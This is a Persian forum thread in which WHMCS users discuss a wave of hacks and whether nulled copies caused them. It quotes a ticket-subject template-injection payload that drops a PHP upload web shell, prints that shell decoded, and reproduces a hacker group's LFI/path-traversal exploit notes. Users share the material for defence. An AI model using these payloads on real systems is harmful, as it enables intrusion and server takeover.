اونی که میاد نال میزنه و ...نقل قول:
نوشته اصلی توسط plastic
اصلا کـــــــــــــــــــــــا ری نــــــــــــــــدارم!!!!!!!! !!!!!!
هاستینگ که پول یک لایسنس whmcs که اساس کارش هست رو نداره،اصلا هساتینگ نیست!!!:-&
تمام شد!!!
نمایش نسخه قابل چاپ
اونی که میاد نال میزنه و ...نقل قول:
نوشته اصلی توسط plastic
اصلا کـــــــــــــــــــــــا ری نــــــــــــــــدارم!!!!!!!! !!!!!!
هاستینگ که پول یک لایسنس whmcs که اساس کارش هست رو نداره،اصلا هساتینگ نیست!!!:-&
تمام شد!!!
به نظر من هرکی نال میکنه یه باگ هم داخلش نالش میزاره در صورت لزومنقل قول:
نوشته اصلی توسط dr.saeed
اکثرا هم به خاطر رعایت نکردن حق سایتی هست که نال رو انجام میده این موارد پیش میاد
یعنی مثلا پرشن اسکریپت میاد نال میکنه و یک هاستینگ یا یک شخص میاد این اسکریپت رو دانلود میکنه و قسمت پرشین اسکریپت یا نام اون سایت رو حذف میکنه من هم باشم ناراحت میشم و باگی که تو اسکریپ گذاشته باشم لو میدم به یه هکر
به نظر من نسخه نال شده برای چیزایی خوبه استفاده کنیم که خطری رو برای کاربران سایت نداشته باشه نه یه اسکریپ پشتیبانی کاربران هاستینگ استفاده کنیم که اینجوری سایت من که از اون سایت سرویس گرفته بسته شه و نتونم با اون سرویس دهنده تماس بگیرم برای تغییریک دی ان اس یا انتقال اطلاعات هاستینگ
من نال نبودم هک شدم
---------- Post added at 05:55 PM ---------- Previous post was at 05:52 PM ----------
الان یه تیکت اومد واسم
کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}اهمیت: Mediumمحتوای سوال=============================
hi
----------------------------
IP Address: 46.19.139.252
نمیدونم چه ربطی به نال بودن داره دیگه با این موارد که عرض شد باید نتیجه گیری میشد که به نال بودن مربوط نمیشه .
کسی هم که یه چیزی رو نال میکنه نمیاد توش باگ هم درست بکنه!! چون در این صورت نال کردنش = سرگرمی و تفریح و کار الکی
پس به نال بودنش هیچ ربطی نداره.
به هر حال شاید هم ربط داشته باشه و در جریان نباشیم!
شما patch امنیتی رو نصب کرده بودید؟نقل قول:
نوشته اصلی توسط maryam1
بله هم پچو هم باقی چیزارو البته هک رو قبل از نصب پچ شدم
الان طذف سوسک شد:73:
بنا به این که خیلی از دوستان ایرانی توسط این باگ هک میشن این اکسپلویت رو قرار میدم تا با توجه به اون مقابله بکنید:
کد:
$b0x# ZxH-Labs
$b0x# 1st-NOV-11
$b0x# Www.Sec4ever.coM
$b0x# WH-03 On Windows IIS 6.0
========================================================
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL
EXPL Type : Local File Disclosure
Files : Submitticket.php , Downloads.php
-> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00
->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00
b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.bug
Bug TYPE : Local File Include
Bug File : Reports.php
-I : reports.php?report=[LFI]%00
EX : admin/reports.php?report=../../../../../../../boot.ini%00
You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
-FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
And Don't Forget To Use IFRAME With Evil Code'z =))
b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
========================================================
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever | TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3 And All Q8'z
./b0x
امن ترین سرور یک سرور خاموش است!
کل کدی که اینجکت میشه در تیکت ها( با توجه به ارسال maryam1) این هست:
و $code عبارته از:کد:
$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("downloads/b0x.php","w");
fwrite($fo,$code);
?>
با توجه به این موارد میتونید جلوی مورد رو بگیرید.کد:
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
اگر منظورتان گروه ما است هر کسی کوچکترین نارضایتی از ما دارد منتظریم که در بخش انتقاد و پیشنهاد همراه با مدرک تاپیک ارائه کرده و ما نیز با مدرک پاسخ آن ها را خواهیم داد.نقل قول:
نوشته اصلی توسط faranetwork
نقل قول:
نوشته اصلی توسط taranoome
ما به هیچ عنوان از نسخه نال شده استفاده نمی کرده، نمی کنیم و نخواهیم کرد و تمامی مدارک مبنی بر خریداری لایسنس از شرکت فراسو موجود است.نقل قول:
نوشته اصلی توسط atilnic